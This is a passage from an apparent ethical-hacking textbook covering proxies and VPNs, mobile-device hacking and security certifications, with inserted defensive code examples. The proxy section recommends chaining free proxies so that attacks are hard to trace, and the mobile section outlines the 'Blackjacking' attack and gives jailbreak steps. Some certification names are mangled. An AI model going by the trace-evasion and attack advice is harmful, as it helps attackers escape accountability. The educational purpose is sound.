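        return embedder_origin in sources
    xfo = headers.get("x-frame-options", "").upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return embedder_origin == page_origin
    return True  # no anti-framing header at all


def audit_framing(raw_headers: str) -> List[str]:
    """Summarise the anti-framing posture of a response as findings; empty means both controls present."""
    headers = parse_headers(raw_headers)
    findings = []
    if frame_ancestors(headers.get("content-security-policy", "")) is None:
        findings.append("no frame-ancestors directive in Content-Security-Policy")
    if "x-frame-options" not in headers:
        findings.append("no X-Frame-Options header (still needed for older browsers)")
    elif headers["x-frame-options"].upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options value not DENY/SAMEORIGIN: browsers ignore unknown values")
    return findings


# Constructed header blocks (not captured from any real site).
UNPROTECTED = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
XFO_ONLY = UNPROTECTED + "X-Frame-Options: SAMEORIGIN\r\n"
CSP_AND_XFO = (UNPROTECTED + "X-Frame-Options: DENY\r\n"
               "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n")

if __name__ == "__main__":
    for label, hdrs in [("unprotected", UNPROTECTED), ("xfo only", XFO_ONLY), ("csp+xfo", CSP_AND_XFO)]:
        allowed = framing_allowed(hdrs, "https://site.test", "https://attacker.test")
        print(f"{label}: frameable by attacker.test = {allowed}; findings = {audit_framing(hdrs)}")
```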


Chapter 13 Proxy & VPN technology

Objectives:

Proxy technology
Introduction
Working of proxy server
Types of proxy server
Socks proxy
Free proxy servers
Use proxies for attack
Tools
VPN
Introduction
Working of VPN
Types of VPN
Free VPN services
VPN tools


Proxy Technology

Introduction

A proxy server is a server that acts as an intermediary between internal and external hosts. The proxy server hides the computer from the outside network.

Working of Proxy Server

When an internal host requests a website, the request goes to the proxy server; the proxy server takes the header from the IP packet, reconstructs the data packet with a different IP address and sends it to the external host.

Types of Proxy Server

Caching Proxy Server: Caching is servicing the requests of clients with the help of content saved from previous requests, without contacting the specified server.

Web Proxy Server: A proxy targeted at the World Wide Web is called a web proxy server.

Anonymizing Proxy Server: It tries to anonymize web surfing.

Transparent Proxy Server: It doesn't modify the request and response beyond what is required for proxy authentication and identification. It works on port 80.

Non-Transparent Proxy Server: It is a proxy that modifies the request and response in order to add some services to the user agent.

Socks Proxy

SOCKS is an IETF standard. It is a proxy system which supports proxy-aware applications. Its package includes three components:
(1) A SOCKS server for the operating system.
(2) A client program like ftp, telnet etc.
(3) A client library for SOCKS.

The SOCKS proxy doesn't allow external components to collect information about the client which generated a request.

Free Proxy Servers

Attacking through thousands of proxy servers would be difficult to trace, and there are thousands of proxy servers available on the internet. Some websites which provide free proxy servers are listed below:
http://www.proxy4free.com/
http://spys.ru/en/
http://tools.rosinstrument.com/proxy/?rule1

Use of Proxies for attack

An attacker uses a chain of proxies for an attack; the IDS or firewall installed at the victim server will always log the last proxy's IP address, which is why tracing back is difficult.

Tools

Allegrosurf

It is a web-accelerating, content-filtering proxy server. It allows a user to share a single internet connection with the rest of the network while protecting users from unwanted content and increasing overall speed.


Download Link: http://www.downloadsofts.com/download/Servers/Firewall-Proxy-Servers/AllegroSurf-download-details.html

Proxy Manager

It connects to the internet and downloads lists of proxy servers from various websites. You will have thousands of proxy server IP addresses within a minute.

Download Link: http://www.brothersoft.com/proxy-manager-35000.html


Tor Proxy Chaining Software

Tor is a network of virtual tunnels connected together that works like a big chained proxy. It masks the identity of the originating computer from the internet. It is the best proxy tool ever made.

Download Link: https://www.torproject.org/download/download.html.en

JAP Proxy

JAP enables anonymous web surfing with any browser through the use of integrated proxy services that hide your real IP address.

Download Link: http://en.kioskea.net/download/download-3480-jap

VPN(Virtual Private Network)

Introduction

A virtual private network (VPN) is a network that uses primarily publictelecommunication infrastructure, such as the Internet, to provide remote offices ortraveling users access to a central organizational network.

VPNs typically require remote users of the network to be authenticated, and often securedata with encryption technologies to prevent disclosure of private information tounauthorized parties.

Working of VPN

When an internal host requests to transfer data to an external host over the internet, the VPN creates an encrypted tunnel between the internal host and the external host while the data is transferred over the internet.


Types of VPN

PPTP VPN(Dial-up VPN)

A simple method for a VPN is PPTP. It is a software-based VPN system that uses your existing Internet connection. Using your existing Internet connection, a secure "tunnel" is created between two points, allowing a remote user to connect to a remote network.

Site-to-site VPN

Site-to-site is much the same thing as point-to-point except there is no "dedicated" line in use. Each site has its own internet connection, which may not be from the same ISP or even of the same type. One may have a T1 while the other only has DSL. Unlike point-to-point, the routers at both ends do all the work: they do all the routing and encryption.

Point-to-Point VPN

A traditional VPN can also come as point-to-point. These are also referred to as "leased-line VPNs." Simply put, two or more networks are connected using a dedicated line from an ISP. These lines can be packet or circuit switched, for example T1s, Metro Ethernet, DS3, ATM or something else.

MPLS VPN

MPLS is a true "ISP-tuned" VPN. It requires 2 or more sites connected via the same ISP or an "on-net" connection. There is a way to configure this using different ISPs or "off-net", but you never get the same performance. I've tried... While it does use your existing Internet connection, tweaks are made by your ISP for performance and security.

Free VPN Services

A VPN protects user privacy over the Internet. A few services available on the Internet provide free VPN access.


ProXPN

A free VPN service designed for use with Windows and Mac computers. ProXPN works by downloading a small free application from which to connect. The service is also compatible with the iPhone and other mobile phones that support VPN.

Web: www.proxpn.com

GPass


The GPass service provides free VPN access as well as an impressively fast web proxy to use directly in your browser. The service is very popular in China, where Internet censorship is commonplace.

Web: http://gpass1.com/gpass/

CyberGhost

Offering 1GB of encrypted traffic per month on the free package, CyberGhost is another Windows-only VPN client. In order to use the service you are required to register for a free account, which unfortunately does not allow you to pick and choose your servers.

Web: http://cyberghostvpn.com/en/surf-anonym.html

SecurityKiss

The free package provided by SecurityKiss brings you 300MB of data transfer per day, but provides an uncapped line with plenty of speed. You'll need the SecurityKiss software to access the service, and this is only compatible with Windows.

Web: http://www.securitykiss.com/

VPN Tools

VPN software brings the security of a private network to an insecure network, and allows you to access private local networks from anywhere. Some VPN tools are available which we can use to protect our privacy.

OpenVPN

OpenVPN is an open source VPN server that's easy to set up for use with open source VPN clients. You can easily export configuration files from OpenVPN to import into a variety of open source and commercial clients.

Download Link: http://www.openvpn.net/
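The OpenVPN entry above mentions exporting configuration files. What a defender actually reviews in such a file is the handful of directives that decide whether the tunnel described under "Working of VPN" resists tampering and server impersonation. The following is an added example, not code from the book or from the OpenVPN project: a small Python linter that parses a client profile and flags weak settings (a legacy 64-bit block cipher, no data-channel HMAC, compression, no check that the peer certificate is a server certificate) beside a hardened profile that passes clean. The two profiles, the placeholder host vpn.example.com and the severity labels are assumptions of the example.

```python
"""Added example (not from the book or the OpenVPN project): lint an OpenVPN
client profile for weak or missing security directives.

Assumes the OpenVPN 2.x profile syntax: one "directive arg ..." per line,
lines starting with '#' or ';' are comments, and <tag> ... </tag> wraps
inline certificate/key material.  Both profiles below are constructed
samples; vpn.example.com is a placeholder server name."""
import re

WEAK_PROFILE = """\
client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert client.crt
key client.key
# 64-bit block cipher, and no HMAC on the data channel
cipher BF-CBC
auth none
comp-lzo
"""

HARDENED_PROFILE = """\
client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert client.crt
key client.key
# only accept a certificate issued for server use, with the expected name
remote-cert-tls server
verify-x509-name vpn.example.com name
# extra key protecting the TLS control channel
tls-crypt ta.key
tls-version-min 1.2
cipher AES-256-GCM
auth SHA256
"""

WEAK_CIPHERS = {"none", "bf-cbc", "des-cbc", "des-ede3-cbc", "rc2-cbc"}
AEAD_CIPHERS = {"aes-128-gcm", "aes-192-gcm", "aes-256-gcm", "chacha20-poly1305"}


def parse_profile(text):
    """Return [(directive, [args...])]; inline <tag> blocks become (tag, [])."""
    directives = []
    lines = iter(text.splitlines())
    for raw in lines:
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        block = re.fullmatch(r"<([\w-]+)>", line)
        if block:
            tag = block.group(1).lower()
            for inner in lines:              # skip the embedded PEM material
                if inner.strip() == f"</{tag}>":
                    break
            directives.append((tag, []))
            continue
        name, *args = line.split()
        directives.append((name.lower(), args))
    return directives


def lint_profile(text):
    """Return a list of (severity, directive, message) findings."""
    directives = parse_profile(text)
    present = {name for name, _ in directives}
    findings = []

    def first_args(name):
        return next((args for n, args in directives if n == name), None)

    cipher = first_args("cipher")
    cipher_name = cipher[0].lower() if cipher else None
    if cipher_name in WEAK_CIPHERS:
        findings.append(("high", "cipher",
                         f"{cipher[0]} is weak or disabled; use an AEAD cipher such as AES-256-GCM"))
    elif cipher is None and "data-ciphers" not in present:
        findings.append(("low", "cipher", "no cipher pinned; the negotiated default decides"))

    auth = first_args("auth")
    if auth and auth[0].lower() in ("none", "md5") and cipher_name not in AEAD_CIPHERS:
        findings.append(("high", "auth",
                         f"auth {auth[0]} leaves data packets without a sound integrity check"))

    if "remote-cert-tls" not in present:
        findings.append(("high", "remote-cert-tls",
                         "missing 'remote-cert-tls server': any certificate from the CA, "
                         "including another client's, would be accepted as the server"))
    if "verify-x509-name" not in present:
        findings.append(("medium", "verify-x509-name", "server certificate name is not pinned"))
    if not ({"tls-auth", "tls-crypt", "tls-crypt-v2"} & present):
        findings.append(("medium", "tls-auth", "control channel has no tls-auth/tls-crypt key"))
    if "tls-version-min" not in present:
        findings.append(("low", "tls-version-min", "no minimum TLS version set"))
    compress = first_args("compress")
    if "comp-lzo" in present or compress not in (None, [], ["stub"], ["stub-v2"]):
        findings.append(("medium", "compression",
                         "compressing data before encryption can leak plaintext through packet sizes"))
    return findings


if __name__ == "__main__":
    for label, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        results = lint_profile(profile)
        print(f"[{label}] {len(results)} finding(s)")
        for severity, directive, message in results:
            print(f"  {severity:6} {directive:18} {message}")
```

Run it and the weak profile produces findings for the cipher, the missing HMAC, the missing server-certificate check and compression, while the hardened profile produces none. The checks are deliberately conservative: `compress stub` (framing without compression) is not flagged, and `auth none` is only flagged when the data channel is not already protected by an AEAD cipher.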


LogMeIn Hamachi

Hamachi's strongest attribute is its ease of use. If you've read some of the other entries in the Hive Five and realized that you don't want a contract for a corporate VPN or the hassle of configuring a bunch of routers with open-source firmware packages, and you just want to set up a simple virtual network between you and your friend, your phone, or your office, Hamachi offers nearly instant deployment.

Download Link: http://www.logmeinhamachi.com/

Windows Built-In VPN

Windows has a built-in VPN client. Before exploring other client solutions, it's worth pulling up the quick launch box in the Windows start menu and typing "VPN" to start the configuration process. In Windows versions prior to Windows Vista, the built-in VPN client received a fair amount of criticism for lacking features and supported protocols.


Chapter 14 Hacking Handheld devices

Objectives:

- Different OS in mobile phones
- What can a hacker do with your mobile phone
- Vulnerabilities in different mobile phones
- Spyware
- BlackBerry handheld devices
- iPhone & iPod jailbreaking
- iPhone hacking using iFuntastic
- Trojans & viruses
- Mobile antivirus
- Mobile phone security tips


Different OS in Mobile Phone

- Windows Mobile
- Symbian OS
- BlackBerry OS
- Apple iOS

What Can a Hacker DO with your mobile phone

- Steal your information
- Rob your money
- Spy on you
- Access your voice mails, messages, etc.
- Insert a virus

Vulnerabilities in different Mobile Phones

- A format string vulnerability has been found in RIM's BlackBerry 7270. It allows a remote attacker to disable the phone's calling feature.

- The HTC Hytn running AGEPhone is vulnerable to malformed SIP messages sent over wireless LAN connections. They allow a remote attacker to disconnect active calls.

- A buffer overflow vulnerability in the Samsung SCH-i730 running the SJPhone SIP client allows an attacker to disable the phone and slow down the operating system.

Spyware:SymbOS/Htool-SMSSender.A.intd

It is a prototype malware application that targets Symbian OS. It sends copies of received SMS messages to the spyware author. Spyware:SymbOS/Htool-SMSSender.A.intd is distributed as "XaSMS.SIS". Both the source code and the SIS file are included in a RAR archive file named "HackSMS.rar". It copies the text of the last SMS message received, places it into a new SMS, and forwards the message to the spyware author.

Spyware:SymbOS/MultiDropper.CG

It is a spyware application that targets the Symbian operating system for mobile phones. The spyware application comes with a variant of the MultiDropper mobile phone Trojan.


It tracks messages and copies log files containing the phone numbers of incoming and outgoing phone calls.

Blackberry Handheld device

The "BlackBerry attack toolkit", along with the "BBproxy" software, exploits vulnerabilities in a company's website. BBproxy is security assessment software that allows a proxy connection between the Internet and the internal network. The "attack vector" tricks or links the user into downloading malicious software.

Blackjacking


The BBproxy tool is used for the Blackjacking attack. An attacker installs this tool on his BlackBerry device and then sends it to the targets as an e-mail attachment. The channel between the BlackBerry server and the handheld device is encrypted and can't be properly inspected by security products.

Blackberry Wireless Security

The BlackBerry enterprise solution uses the AES and triple-DES encryption methods to encrypt data in transit. The BlackBerry enterprise solution is designed so that data remains encrypted during transit between the handheld device and the BlackBerry server.

Countermeasures

- Clean the BlackBerry device memory.
- Protect stored messages on the messaging server.
- Encrypt the application password and storage on the BlackBerry device.
- Use AES technology to secure the storage of Password Keeper.

IPhone & IPod Jailbreaking


Jailbreaking is the process of unlocking an iPod or iPhone to allow the installation of third-party applications. It opens up your iPhone's filesystem so that it can be accessed from your computer.

Tools for Jailbreaking

A few tools are available for iPhone jailbreaking.

iDemocracy

iDemocracy is an iPhone jailbreak and third-party app tool for the Windows platform. It installs Installer.app (for third-party apps and games) and simunlock.

Download Link: http://code.google.com/p/idemocracy/downloads/list


iActivator

It works on the Mac operating system, providing GUI tools for iPhone jailbreaking and activation/deactivation.

Download Link: http://www.filestube.com/c191b10600f1cfcd03ea,g/iActivator-v1-1-4.html

iFuntastic


iFuntastic is an iPhone modification and hacking tool. It has a full file browser feature, which browses the iPhone's internal file system, and can edit UI images.

Download Link: http://ifuntastic.soft32.com/free-download

iPhone Hacking using iFuntastic

Prerequisite

- An Intel Mac
- The iPhone Hacking Kit
- Your Mac and iPhone connected to the same Wi-Fi network

Steps to perform iPhone Hacking

1. Install iFuntastic into your Applications folder.
2. After installing, reboot your Mac.
3. Make sure your iPhone is on, then plug it into your Mac using the USB cable.
4. After iTunes launches, quit it.
5. Launch iFuntastic.
6. Press the Prepare button on the left side of the iFuntastic window.
7. Click the Jailbreak button at the bottom of the window.
8. On the next page of the window there are six steps; follow them. You will see the window shown on the next slide.

Tool to unlock iPhone: anySIM

anySIM is a GUI-based unlocking system for the iPhone. It is for iPhones currently running OS v1.1.1, or iPhones that were upgraded from 1.0.2 to 1.1.1.


Steps for Unlocking your iPhone using AnySIM

1. Jailbreak your iPhone with the software.
2. Set it up to install third-party applications.
3. Download anySIM and expand the ZIP file.
4. Drag the resulting file "anySIM" (full name anySIM.app) to your /Applications folder.
5. Open Terminal (located in /Applications/Utilities) and type the following, replacing IPADDRESS with the IP address of your iPhone:

   scp -r /Applications/anySIM.app root@IPADDRESS:/Applications/

6. Restart your iPhone.
7. Run the anySIM application to unlock your phone.

Trojans and Viruses

Cabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is shown every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals.


Duts: A parasitic file infector virus and the first known virus for the PocketPC platform. It attempts to infect all EXE files in the current directory (it infects files that are bigger than 4096 bytes).

Skulls: A Trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also renders all phone applications, including SMS and MMS, useless.

Commwarrior: The first worm to use MMS messages in order to spread to other devices. It can spread through Bluetooth as well. It infects devices running Symbian OS Series 60. The executable worm file, once launched, hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.

Antivirus

Kaspersky Antivirus


Kaspersky Anti-Virus Mobile protects smartphones from malicious programs that target mobile platforms.

Download Link: http://www.kaspersky.com/kaspersky_mobile_security

BitDefender Mobile security

BitDefender Mobile Security provides antivirus protection for mobile devices running Symbian or Microsoft Windows Mobile.

Download Link: http://www.bitdefender.com/solutions/mobile-security-android.html

BullGuard Mobile Antivirus

BullGuard protects Pocket PCs and smartphones from malicious programs that target mobile platforms. It offers both on-demand and on-access scanning.

Download Link: http://www.bullguard.com/products/bullguard-mobile-security-10.aspx

Mobile Phone Security Tips

- Keep your mobile antivirus updated.
- When entering a crowded zone, make sure to switch off Bluetooth.
- Do not open untrustworthy applications.
- Do not pair with unknown devices.
- Register the 15-digit IMEI number of your GSM handset.
- Protect your device by setting up a personal identification number (PIN).
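The tip about registering the handset's 15-digit IMEI is only useful if the number you record is the right one. The last digit of an IMEI is a Luhn check digit over the first 14, so a mistyped or transposed number can be caught before it is registered. As an added example, not code from the book, here is a small Python validator for that check; the sample IMEI below is a sample value used for illustration, not a real handset's number.

```python
"""Added example (not from the book): validate a 15-digit IMEI before
recording it.  The 15th digit is a Luhn check digit over the first 14."""

SAMPLE_IMEI = "49-015420-323751-8"   # sample value in TAC-serial-check layout


def luhn_sum(digits: str) -> int:
    """Luhn sum: from the right, every second digit is doubled and, when the
    product has two digits, they are added (the same as subtracting 9)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total


def normalize(imei: str) -> str:
    """Drop the separators people type between TAC, serial and check digit."""
    return imei.replace("-", "").replace(" ", "")


def is_valid_imei(imei: str) -> bool:
    """True only for exactly 15 digits whose Luhn sum is a multiple of 10."""
    digits = normalize(imei)
    return len(digits) == 15 and digits.isdigit() and luhn_sum(digits) % 10 == 0


def imei_check_digit(first14: str) -> str:
    """Compute the check digit that completes a 14-digit TAC + serial."""
    digits = normalize(first14)
    if len(digits) != 14 or not digits.isdigit():
        raise ValueError("expected 14 digits")
    # Put a placeholder 0 in the check position, then choose the digit that
    # brings the total up to the next multiple of 10.
    return str((10 - luhn_sum(digits + "0") % 10) % 10)


if __name__ == "__main__":
    state = "valid" if is_valid_imei(SAMPLE_IMEI) else "invalid"
    print(f"{SAMPLE_IMEI}: {state}")
```

A single wrong digit, or two adjacent digits swapped, changes the Luhn sum and fails the check; the validator does not and cannot tell you whether the number belongs to your handset, only that it is well-formed.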


Chapter 15 Career Certification in IT Security

Objectives:

- CompTIA
- Cisco Systems
- EC-Council
- GIAC
- ISACA
- Offensive Security
- (ISC)²


IT security certifications rose 3.1% in value over the past two years and 1.2% in value in the last six months. Certain types of security skills are seeing dramatic growth. A 27% rise in value was measured for the Certified Information Security Manager designation, just in the past six months.

Brodkin reported on a survey carried out for the International Information Systems Security Certification Consortium, (ISC)^2, which showed "that holders of the CISSP, SSCP or CAP certifications who work in the Americas and have at least five years experience earn [an average of] $102,376 per year – more than $21,000 higher than IT pros who also have five years experience but lack the certifications."

Several vendors working in the field of information security provide career certifications to candidates.

CompTIA

CompTIA is a provider of professional certifications for the information technology (IT) industry. CompTIA chairs and manages the Initiative for Software Choice.

Certifications provided in information security are:

- Security+
- CSPA

Visit http://www.comptia.org/ for more details.

Cisco Systems


Cisco Systems also sponsors a line of IT professional certifications for Cisco products. There are five levels of certification: Entry, Associate, Professional, Expert, and recently Architect, as well as eight different paths: Routing & Switching, Design, Network Security, Service Provider, the newly introduced Service Provider Operations, Storage Networking, Voice, and Wireless.

Certifications in Information security:

- CCNA Security
- CCSP
- CCIE Security

EC-Council

The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge.

These are some of EC-Council's best-known certification products:

- C!EH
- CH!FI
- E!CSA
- LPT
- ENSA


GIAC

GIAC is an information security certification entity that specialises in technical and practical certification, as well as new research in the form of its GIAC Gold program.

- GSIF
- GSEC
- GCIA

ISACA

ISACA is an international professional association that deals with IT governance. It is an affiliate member of IFAC. Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.

- CISA
- CISM


Offensive Security

Offensive Security is a leading information security company which offers highly skilled training on information security products. It is the only vendor that offers real-time live training on information technology. It offers the following certification courses:

- OSCP (Offensive Security Certified Professional)
- OSEE (Offensive Security Exploitation Expert)
- OSWE (Offensive Security Web Expert)
- OSCE (Offensive Security Certified Expert)
- OSWP (Offensive Security Certified Wireless Professional)

(ISC)²

The International Information Systems Security Certification Consortium ((ISC)2) is a non-profit organization headquartered in Palm Harbor, Florida. The most widely known certification offered by the organization is the Certified Information Systems Security Professional (CISSP) certification. [1] [2]

The organization maintains what it calls a Common Body of Knowledge for information security for the following certifications:

CISSP

ISAAP

SSAP

SSCP


List of top 10 Highest Paying IT Certifications

According to recent salary surveys by ZDNET's TechRepublic organization, the following are the highest paying certifications to have in the technology industry.

Following each certification is the average annual salary being paid to individual responders that hold the certification. I have also listed training resources to learn more information about how to acquire each of the highest paying certifications.

1. PMI Project Management Professional (PMP)
With an average annual salary of $101,695, the PMP certification from the Project Management Institute (PMI) organization tops the list of highest paying certifications for the current year.

2. PMI Certified Associate in Project Management (CAPM)
Next highest on the list of highest paying certifications is PMI's Certified Associate in Project Management (CAPM). The average annual salary for CAPM holders that were surveyed is $101,103.

3. ITIL v2 - Foundations
With an annual average salary of $95,415, the ITIL v2 Foundations certification came up third on the list of highest paying certifications. ITIL stands for the IT Infrastructure Library. The ITIL certification is designed to show expertise in ITIL service support and service delivery.

4. Certified Information Systems Security Professional (CISSP)
Coming in at a close 4th on the list of highest paying certifications is the Certified Information Systems Security Professional or CISSP certification from (ISC)2. The average annual reported salary was $94,018.

5. Cisco CCIE Routing and Switching
At $93,500 per year average annual salary, the Cisco CCIE Routing and Switching certification came in 5th on the list of highest paying certifications in the technology industry.

6. Cisco CCVP - Certified Voice Professional
Number six on the list of the highest paying certifications is the Cisco CCVP or Cisco Certified Voice Professional. The average annual salary of CCVP respondents was $88,824.

7. ITIL v3 - ITIL Master
The ITIL v3 certification - the ITIL Master - came in 7th on the list of the highest paying technical certifications. The average annual salary for ITIL Master certification holders was $86,600.


8. MCSD - Microsoft Certified Solution Developer
The MCSD or Microsoft Certified Solution Developer certification pays an average of $84,522. This puts the MCSD certification at number 8 on the list of highest paying certifications in technology.

9. Cisco CCNP - Cisco Certified Network Professional
The Cisco Certified Network Professional or CCNP certification is number 9 on the list of highest paying technical certifications. The average annual salary reported by CCNP holders is $84,161.

10. Red Hat Certified Engineer
The Red Hat Certified Engineer (RHCE) came in at number 10 on the list of highest paying certifications. The average annual salary reported by Red Hat Certified Engineers is $83,692.
